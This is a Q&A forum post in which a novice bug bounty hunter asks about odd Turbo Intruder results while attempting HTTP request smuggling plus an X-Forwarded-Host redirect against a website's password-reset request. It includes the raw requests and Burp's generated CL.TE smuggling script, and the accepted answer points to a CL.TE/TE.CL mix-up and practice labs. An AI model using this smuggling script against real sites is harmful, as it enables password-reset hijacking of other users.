# Strange response when using Turbo Intruder

Tags: security, request, burp

I'm a bug bounty hunter and just new to it. Few days ago, I read about the *request smuggling* vulnerability. And just after that, I started to find it on the Internet. Yesterday, I found a website that when I add `X-Forwarded-Host: google.com` to the header, it redirected me to https://www.google.com. It's very hard to exploit this so I have think about combine it with *request smuggling*. I choose the change password request as the target:

```
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1

email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
```

I convert it to chunked:

```
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3



0
```

But when I sent it, it gave me the `503 client read error` code. Look like it doesn't accept *chunked*. But, I still want to continue, so I download *HTTP Request Smuggler* and *Turbo Intruder* extensions on Burp Suite. Then I do *Smuggle attack (CL.TE)*. It give a smuggle attack python code:

```
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):

    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
```

Then I run it using *Turbo Intruder*. And I was very surprise, it sent 14 requests but just 12 requests are `503` and 2 left are `200`. Special, in the `200` response header, it has `...transfer-encoding: chunked...`. I have tried few times and it just gave the same result: 1 or 2 requests are `200`. But something strange here, in the code, it's `...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''...`. After few tests I think that it's not the request smuggling bug because the response shown that it is the response of the original request, not the `prefix` in the code (I have tried to change the `prefix` too and it's still `200`, not `400`, `404`, ... like I expect).

So is there anyone(must be a very professional hacker) know what vulnerability am I facing? Thank you!

Answer (score 1, accepted):

First of all, your first converted request in chunked in `TE;CL` but after using burp extension you found its `CL;TE`, so the problem may be there.
As with responses you are a bit confused, I recommend you to solve portswigger http request smuggling labs as I have completed that recently by which your fundamentals will get pretty strong!